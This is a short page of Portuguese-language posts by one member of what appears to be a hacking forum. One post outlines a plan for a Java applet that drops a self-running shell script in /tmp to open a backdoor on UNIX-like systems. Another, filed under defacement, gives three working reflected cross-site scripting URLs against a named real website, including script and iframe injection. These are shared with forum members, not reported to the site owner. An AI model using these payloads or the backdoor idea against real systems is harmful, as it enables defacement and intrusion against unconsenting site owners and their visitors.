Menu

Show posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Show posts Menu

Messages - andrezc

#1
Legal.  Não testei, mas vou testar.  Acabei ficando curioso.  Eu estou pensando em criar um java applet que cria um shell script em /tmp e se auto-executa, esse shell script deve abrir um backdoor em sistemas UNIX e UNIX-like (Linux,  *BSD e etc.) .  É um pouco improvável essa parte de se auto-executar, já que os arquivos no Linux não são auto-executáveis como no Windows, mas estou pesquisando bastante a respeito.
#2
Mim rir muito :D

Aposto 10 mangos se não é troll...
#3
Defacement / Brasil.com.br - Cross site scripting
01 de May , 2010, 01:32:58 AM
Ontem pela madrugada, eu estava fazendo algumas pesquisas no Google, coisa boba, sem finalidade alguma, procurando sites diferentes, daí, pensei em pesquisar por "Brasil", daí, cheguei até o site:

http://brasil.com.br/

Quando fui realizar uma pesquisa nele, me deparo com o que eu havia digitado. Eu pensei Opa! Já que estou aqui, realizarei alguns testes...

E olha só o que eu achei:

http://brasil.com.br/busca?q=%3Cscript%3Ealert%28%22XSS+++%3A%28%22%29%3C%2Fscript%3E&commit=Buscar

http://brasil.com.br/busca?q=%3Cbig%3E%3Cbig%3E%3Cbig%3E%3Cstrong%3EXSS%3Cbr%3E%3Cbr%3EAndreZC+%3Cbr%3E+%3Ciframe+src%3D%22http%3A%2F%2Fwww.milw0rm.com%2F%22%3E%3C%2Fiframe%3E&commit=Buscar

http://brasil.com.br/busca?q=%3Cbig%3E%3Cbig%3E%3Cbig%3E%3Cbig%3E%3Cbig%3E%3Cbig%3E%3Cbig%3E%3Cbig%3E%3Cbig%3EXSS&commit=Buscar

É isso, achei que alguns aqui do fórum iriam gostar de saber.

Até.